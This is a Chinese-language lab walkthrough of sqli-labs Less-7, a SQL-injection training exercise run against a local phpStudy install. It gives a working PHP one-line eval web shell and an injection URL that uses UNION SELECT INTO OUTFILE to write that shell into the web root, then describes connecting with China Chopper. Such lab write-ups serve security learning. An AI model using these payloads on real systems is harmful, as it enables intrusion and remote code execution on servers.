less-7

 

前置基础知识：

1. 因为我们用的是phpstudy，所以存在一个文件读写权限问题，我们需要修改一下

 

首先在mysql命令行中用show variables like '%secure%';查看 secure-file-priv 当前的值，如果显示为NULL，则需要打开 C:\phpstudy\PHPTutorial\MySQL\my.ini文件，在其中加上一句：secure_file_priv=“/”。

 

 

 

 

 

 之后重启PHP study，然后发现已经发现发生了改变，说明修改成功，就可以进行读写了。

 

 

 

 第二个知识就是一句话木马

一句话木马有多个版本的，asp php的

这里我们只用到php版本的一句话木马：

<?php @eval($_POST[“crow”]);?> 其中crow是密码

一句话木马大多配合中国菜刀使用，菜刀的使用可以参考：https://www.daixiaorui.com/read/17.html

 

以及第三个知识，用到的两个函数：load_file()  读取本地文件  into outfile 写文件    可以百度函数用法，提示路径需要用双斜线

 

我们看到提示使用函数outfile，并且可以确定存在注入漏洞

 

 

 

 

 

 

之后我们用outfile将一句话木马写入文件，虽然依然显示报错，但是我们发现路径下已经存在了我们想要的文件

http://192.168.5.100/sqli-labs/Less-7/?id=-1')) union select 1,2,'<?php @eval($_POST[“crow”]);?>' into outfile "C:\\phpstudy\\PHPTutorial\\WWW\\sqli-labs\\Less-7\\test.php" --+

 

 

 

 

 

 

 

 这里注意一句话木马里面的引号里面的就是密码，我们用中国菜刀进行连接:

 

 

 

 

 

 我们可以看到i，已经成功连接，可以进行文件管理

 

其实，用中国菜刀比较简单，我们当然也可以把注入的内容回显的数据用outfile输出到文件中，步骤和前几关就类似了。